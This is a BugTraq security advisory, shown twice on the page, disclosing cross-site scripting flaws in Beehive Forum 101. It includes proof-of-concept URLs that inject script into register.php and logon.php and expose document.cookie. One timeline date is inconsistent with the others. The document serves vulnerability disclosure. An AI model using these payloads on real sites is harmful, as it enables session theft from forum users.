BugTraq
Back to list
|
Post reply
Beehive Forum 101 Multiple XSS vulnerabilities
Jan 15 2012 05:07PM
sschurtz darksecurity de
Advisory: Beehive Forum 101 Multiple XSS vulnerabilities
Advisory ID: SSCHADV2011-042
Author: Stefan Schurtz
Affected Software: Successfully tested on Beehive Forum 101
Vendor URL: http://www.beehiveforum.co.uk/
Vendor Status: informed
==========================
Vulnerability Description
==========================
Beehive Forum 101 is prone to multiple XSS vulnerabilities
==================
PoC-Exploit
==================
// XSS
http://[target]/forum/register.php?'"</script><script>alert('XSS')</scri
pt>
http://[target]/forum/register.php/'"</script><script>alert(document.coo
kie)</script>
http://[target]/forum/logon.php?'"</script><script>alert('XSS')</script>
http://[target]/forum/logon.php/'"</script><script>alert(document.cookie
)</script>
=========
Solution
=========
-
====================
Disclosure Timeline
====================
26-Dec-2011 - vendor informed
29-Dec-2011 - vendor feedback
15-Jan-2011 - no patch available
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.darksecurity.de/advisories/SSCHADV2011-042.txt
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Advisory ID: SSCHADV2011-042
Author: Stefan Schurtz
Affected Software: Successfully tested on Beehive Forum 101
Vendor URL: http://www.beehiveforum.co.uk/
Vendor Status: informed
==========================
Vulnerability Description
==========================
Beehive Forum 101 is prone to multiple XSS vulnerabilities
==================
PoC-Exploit
==================
// XSS
http://[target]/forum/register.php?'"</script><script>alert('XSS')</scri
pt>
http://[target]/forum/register.php/'"</script><script>alert(document.coo
kie)</script>
http://[target]/forum/logon.php?'"</script><script>alert('XSS')</script>
http://[target]/forum/logon.php/'"</script><script>alert(document.cookie
)</script>
=========
Solution
=========
-
====================
Disclosure Timeline
====================
26-Dec-2011 - vendor informed
29-Dec-2011 - vendor feedback
15-Jan-2011 - no patch available
========
Credits
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References
===========
http://www.darksecurity.de/advisories/SSCHADV2011-042.txt
[ reply ]